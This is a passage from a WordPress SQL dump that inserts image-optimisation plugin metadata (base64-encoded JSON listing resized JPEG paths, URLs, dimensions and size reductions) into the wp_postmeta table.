JBTk5FUi1lMTQ3MjgyMTk3NTc3OS0zMDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS1JZVE9YLUJBTk5FUi1lMTQ3MjgyMTk3NTc3OS0zMDB4NjguanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9LUllUT1gtQkFOTkVSLWUxNDcyODIxOTc1Nzc5LTMwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4MDEsImlkIjoxMTc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS1JZVE9YLUJBTk5FUi1lMTQ3MjgyMTk3NTc3OS00MDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS1JZVE9YLUJBTk5FUi1lMTQ3MjgyMTk3NTc3OS00MDB4NjguanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9LUllUT1gtQkFOTkVSLWUxNDcyODIxOTc1Nzc5LTQwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4MDQsImlkIjoxMTc5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29704, 1177, 'wpfc_optimisation_reduction', '2455809'); 
INSERT INTO `wp_postmeta` VALUES (29705, 1177, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEuanBnIiwicmVkdWN0aW9uIjoyNDU1MTY4LCJ0aW1lIjoxNDgzNTc0ODE1LCJpZCI6IjExNzcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDgxOCwiaWQiOjExNzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0ODIyLCJpZCI6MTE3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4MjUsImlkIjoxMTc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0ODI5LCJpZCI6MTE3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4MzEsImlkIjoxMTc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDgzNCwiaWQiOjExNzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0ODM2LCJpZCI6MTE3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4MzksImlkIjoxMTc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxODksInRpbWUiOjE0ODM1NzQ4NDIsImlkIjoxMTc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoyMjQsInRpbWUiOjE0ODM1NzQ4NDQsImlkIjoxMTc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoyMTcsInRpbWUiOjE0ODM1NzQ4NDcsImlkIjoxMTc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0ODQ5LCJpZCI6MTE3N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDg1MiwiaWQiOjExNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1NjEtMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU2MS0xLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTYxLTEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4NTUsImlkIjoxMTc3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29706, 1176, 'wpfc_optimisation_reduction', '2511417'); 
INSERT INTO `wp_postmeta` VALUES (29707, 1176, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1OTEuanBnIiwicmVkdWN0aW9uIjoyNTExMDg1LCJ0aW1lIjoxNDgzNTc0ODY3LCJpZCI6IjExNzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU5MS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU5MS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU5MS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDg2OSwiaWQiOjExNzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0ODcyLCJpZCI6MTE3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1OTEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1OTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1OTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4NzUsImlkIjoxMTc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU5MS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1OTEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU5MS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0ODc5LCJpZCI6MTE3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1OTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1OTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1OTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4ODEsImlkIjoxMTc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU5MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU5MS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjU5MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDg4NCwiaWQiOjExNzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0ODg3LCJpZCI6MTE3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1OTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI1OTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1OTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ4OTAsImlkIjoxMTc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNDMsInRpbWUiOjE0ODM1NzQ4OTIsImlkIjoxMTc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTkxLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3Vw